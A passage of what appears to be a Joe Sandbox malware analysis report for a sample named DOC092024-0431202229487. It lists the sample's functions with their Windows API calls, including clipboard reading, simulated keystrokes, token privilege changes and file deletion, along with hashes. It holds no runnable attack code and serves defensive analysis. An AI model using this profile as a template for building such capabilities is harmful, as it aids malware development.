                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 14bf6a6adfd0c5f4aef2e309d276156da24f8723ff868630ed3e63eb4aa2d694
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 83B0927244030CB7DE112A82EC02A493B199B50660F008020FB0C18162A677AAA09A89
                                                        Function 0072F92C Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 22f764781426ea2fcb5445d0796cb0e5d6aa7bf0f4b547873e159abd4bc633fd
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 7031D470A04116ABC718DF58E480A69FBB5FB49300B2482BAE48ACB355D735EDC1CBD0
                                                        Function 04D722A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 14638eca4c2649e4ed25e861034fea3b983430149aec35e9e05df85cc130a10b
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: CAE0E67494010EDFDB00EFB4D54969E7FF4EF04301F1005A1FD01D2280D6309D508A72

                                                        Non-executed Functions

                                                        Function 0077F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0077F64E
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0077F6AD
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077F6EA
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0077F711
                                                        • SendMessageW.USER32 ref: 0077F737
                                                        • _wcsncpy.LIBCMT ref: 0077F7A3
                                                        • GetKeyState.USER32(00000011), ref: 0077F7C4
                                                        • GetKeyState.USER32(00000009), ref: 0077F7D1
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0077F7E7
                                                        • GetKeyState.USER32(00000010), ref: 0077F7F1
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0077F820
                                                        • SendMessageW.USER32 ref: 0077F843
                                                        • SendMessageW.USER32(?,00001030,?,0077DE69), ref: 0077F940
                                                        • SetCapture.USER32(?), ref: 0077F970
                                                        • ClientToScreen.USER32(?,?), ref: 0077F9D4
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0077F9FA
                                                        • ReleaseCapture.USER32 ref: 0077FA05
                                                        • GetCursorPos.USER32(?), ref: 0077FA3A
                                                        • ScreenToClient.USER32(?,?), ref: 0077FA47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0077FAA9
                                                        • SendMessageW.USER32 ref: 0077FAD3
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0077FB12
                                                        • SendMessageW.USER32 ref: 0077FB3D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0077FB55
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0077FB60
                                                        • GetCursorPos.USER32(?), ref: 0077FB81
                                                        • ScreenToClient.USER32(?,?), ref: 0077FB8E
                                                        • GetParent.USER32(?), ref: 0077FBAA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0077FC10
                                                        • SendMessageW.USER32 ref: 0077FC40
                                                        • ClientToScreen.USER32(?,?), ref: 0077FC96
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0077FCC2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0077FCEA
                                                        • SendMessageW.USER32 ref: 0077FD0D
                                                        • ClientToScreen.USER32(?,?), ref: 0077FD57
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0077FD87
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077FE1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3461372671-4164748364
                                                        • Opcode ID: ec7636eeb68733ee4f4f457657de5b9c835ffe0b6eaa03cc627775c35e2bc1d2
                                                        • Instruction ID: c78a9a93dbc0a11bd3211b0fdfabdb883bce5d0ef1d84de9d67e05d6ff5107be
                                                        • Opcode Fuzzy Hash: ec7636eeb68733ee4f4f457657de5b9c835ffe0b6eaa03cc627775c35e2bc1d2
                                                        • Instruction Fuzzy Hash: D132BD70204201AFDB20DF68CA84AAABBF5FF48394F14852AFA59C72B1D739DD51CB51
                                                        Function 0077A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0077AFDB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 3850602802-328681919
                                                        • Opcode ID: 6407c729e6faa780f7b274cad85ae803f37981af022f36645418fa28dd5b34a0
                                                        • Instruction ID: 836a9505f6c3c18f702788b8abe9155bc1f37082a9b9baf58e4ec36e9900cafc
                                                        • Opcode Fuzzy Hash: 6407c729e6faa780f7b274cad85ae803f37981af022f36645418fa28dd5b34a0
                                                        • Instruction Fuzzy Hash: 7412BFB1604204BBFF258F64CC49FAE7BB8EF85790F10821AF5199B291DB78D941CB52
                                                        Function 0072F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0072F796
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00784388
                                                        • IsIconic.USER32(000000FF), ref: 00784391
                                                        • ShowWindow.USER32(000000FF,00000009), ref: 0078439E
                                                        • SetForegroundWindow.USER32(000000FF), ref: 007843A8
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007843BE
                                                        • GetCurrentThreadId.KERNEL32 ref: 007843C5
                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007843D1
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007843E2
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007843EA
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007843F2
                                                        • SetForegroundWindow.USER32(000000FF), ref: 007843F5
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078440A
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784415
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078441F
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784424
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078442D
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784432
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078443C
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784441
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00784444
                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0078446B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 83d7dce99b7407b629a35c9f351ba4a2d27faa09a7afd884e2d81f35f2929095
                                                        • Instruction ID: afd71d9ff1beb0fbf99fc65b1788c539d12c74671c8828e30fa079f869d3211a
                                                        • Opcode Fuzzy Hash: 83d7dce99b7407b629a35c9f351ba4a2d27faa09a7afd884e2d81f35f2929095
                                                        • Instruction Fuzzy Hash: 19318871A803187BEB316B719C49F7F3E6CEB44B90F118026FA05E61D1D6B85D11AFA4
                                                        Function 00756B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00757B9F: __wsplitpath.LIBCMT ref: 00757BBC
                                                          • Part of subcall function 00757B9F: __wsplitpath.LIBCMT ref: 00757BCF
                                                          • Part of subcall function 00757C0C: GetFileAttributesW.KERNEL32(?,00756A7B), ref: 00757C0D
                                                        • _wcscat.LIBCMT ref: 00756B9D
                                                        • _wcscat.LIBCMT ref: 00756BBB
                                                        • __wsplitpath.LIBCMT ref: 00756BE2
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00756BF8
                                                        • _wcscpy.LIBCMT ref: 00756C57
                                                        • _wcscat.LIBCMT ref: 00756C6A
                                                        • _wcscat.LIBCMT ref: 00756C7D
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00756CAB
                                                        • DeleteFileW.KERNEL32(?), ref: 00756CBC
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756CDB
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756CEA
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00756CFF
                                                        • DeleteFileW.KERNEL32(?), ref: 00756D10
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00756D37
                                                        • FindClose.KERNEL32(00000000), ref: 00756D53
                                                        • FindClose.KERNEL32(00000000), ref: 00756D61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1867810238-1173974218
                                                        • Opcode ID: 71956f93a832ffe07928850dae264f285500b7b1d344ea7b1fb1b4ec317508a1
                                                        • Instruction ID: 98a95b0c70225ba8d53582dbd6958ecc412483322f45ad739b916f4f65a912ba
                                                        • Opcode Fuzzy Hash: 71956f93a832ffe07928850dae264f285500b7b1d344ea7b1fb1b4ec317508a1
                                                        • Instruction Fuzzy Hash: AD51407290025CAADF21EBA0DC89EEE777CAF05301F4445D6E949A3041DB79AB8DCF61
                                                        Function 00767099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32(007ADBF0), ref: 007670C3
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007670D1
                                                        • GetClipboardData.USER32(0000000D), ref: 007670D9
                                                        • CloseClipboard.USER32 ref: 007670E5
                                                        • GlobalLock.KERNEL32(00000000), ref: 00767101
                                                        • CloseClipboard.USER32 ref: 0076710B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00767120
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0076712D
                                                        • GetClipboardData.USER32(00000001), ref: 00767135
                                                        • GlobalLock.KERNEL32(00000000), ref: 00767142
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00767176
                                                        • CloseClipboard.USER32 ref: 00767283
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: a90ab89771dbf5b1c42b125366f173c33a058edc03774de466e936850b1a8783
                                                        • Instruction ID: fc829801998455d55b541ce510bf75d34f8163d3c3b69d733b354408e8aeee5e
                                                        • Opcode Fuzzy Hash: a90ab89771dbf5b1c42b125366f173c33a058edc03774de466e936850b1a8783
                                                        • Instruction Fuzzy Hash: 5851D031208205AFD329EF64DC9AF6E77A8BB84B41F00851AF946D61E1DF68DC45CA62
                                                        Function 0074B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0074BF0F
                                                          • Part of subcall function 0074BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0074BF3C
                                                          • Part of subcall function 0074BEC3: GetLastError.KERNEL32 ref: 0074BF49
                                                        • _memset.LIBCMT ref: 0074BA34
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0074BA86
                                                        • CloseHandle.KERNEL32(?), ref: 0074BA97
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0074BAAE
                                                        • GetProcessWindowStation.USER32 ref: 0074BAC7
                                                        • SetProcessWindowStation.USER32(00000000), ref: 0074BAD1
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0074BAEB
                                                          • Part of subcall function 0074B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0074B9EC), ref: 0074B8C5
                                                          • Part of subcall function 0074B8B0: CloseHandle.KERNEL32(?,?,0074B9EC), ref: 0074B8D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: dfc7c9aa12fb146af07d6f8d6c3b3891d3e680d3cbfec6fb60e143027479b7e5
                                                        • Instruction ID: 000ee43e8d28c50d203e66cdc8763098e0cc1d2926e7f95251e5cf1915efba40
                                                        • Opcode Fuzzy Hash: dfc7c9aa12fb146af07d6f8d6c3b3891d3e680d3cbfec6fb60e143027479b7e5
                                                        • Instruction Fuzzy Hash: 90816971900209EFDF119FE4DD89AEEBBB9EF08304F14851AF914A6161DB39CE15DB60
                                                        Function 00762044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00762065
                                                        • _wcscmp.LIBCMT ref: 0076207A
                                                        • _wcscmp.LIBCMT ref: 00762091
                                                        • GetFileAttributesW.KERNEL32(?), ref: 007620A3
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007620BD
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007620D5
                                                        • FindClose.KERNEL32(00000000), ref: 007620E0
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007620FC
                                                        • _wcscmp.LIBCMT ref: 00762123
                                                        • _wcscmp.LIBCMT ref: 0076213A
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076214C
                                                        • SetCurrentDirectoryW.KERNEL32(007C3A68), ref: 0076216A
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00762174
                                                        • FindClose.KERNEL32(00000000), ref: 00762181
                                                        • FindClose.KERNEL32(00000000), ref: 00762191
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 440cf413b19aaeff9b3bfbd795d419e05ce83527f52636366ff3c9ca97d6dc97
                                                        • Instruction ID: 5eb423d7c31e78e08d22e9c1b5d64085346516c57e3f7eb9963135843dc7befa
                                                        • Opcode Fuzzy Hash: 440cf413b19aaeff9b3bfbd795d419e05ce83527f52636366ff3c9ca97d6dc97
                                                        • Instruction Fuzzy Hash: 7031B57260461DBADB24DBA4DC49EDE73ACAF06310F108156FD12E3092DB7CDE46CA65
                                                        Function 0077F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0077F14B
                                                          • Part of subcall function 0077D5EE: ClientToScreen.USER32(?,?), ref: 0077D617
                                                          • Part of subcall function 0077D5EE: GetWindowRect.USER32(?,?), ref: 0077D68D
                                                          • Part of subcall function 0077D5EE: PtInRect.USER32(?,?,0077EB2C), ref: 0077D69D
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0077F1B4
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0077F1BF
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0077F1E2
                                                        • _wcscat.LIBCMT ref: 0077F212
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0077F229
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0077F242
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0077F259
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0077F27B
                                                        • DragFinish.SHELL32(?), ref: 0077F282
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0077F36D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 2166380349-3440237614
                                                        • Opcode ID: f18fd6204e8aa6945999f04da0acf71cc850ce91843896c7ecab3677d8b449b1
                                                        • Instruction ID: c4d937c1e92eaadf88a9ec21de7d07e2183da882d8696df1be06a72f643a1850
                                                        • Opcode Fuzzy Hash: f18fd6204e8aa6945999f04da0acf71cc850ce91843896c7ecab3677d8b449b1
                                                        • Instruction Fuzzy Hash: 64613971108300EFC711EF64DC89E9BBBF8BF89750F408A1EF595921A1DB789A45CB62
                                                        Function 0076219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007621C0
                                                        • _wcscmp.LIBCMT ref: 007621D5
                                                        • _wcscmp.LIBCMT ref: 007621EC
                                                          • Part of subcall function 00757606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00757621
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0076221B
                                                        • FindClose.KERNEL32(00000000), ref: 00762226
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00762242
                                                        • _wcscmp.LIBCMT ref: 00762269
                                                        • _wcscmp.LIBCMT ref: 00762280
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00762292
                                                        • SetCurrentDirectoryW.KERNEL32(007C3A68), ref: 007622B0
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007622BA
                                                        • FindClose.KERNEL32(00000000), ref: 007622C7
                                                        • FindClose.KERNEL32(00000000), ref: 007622D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
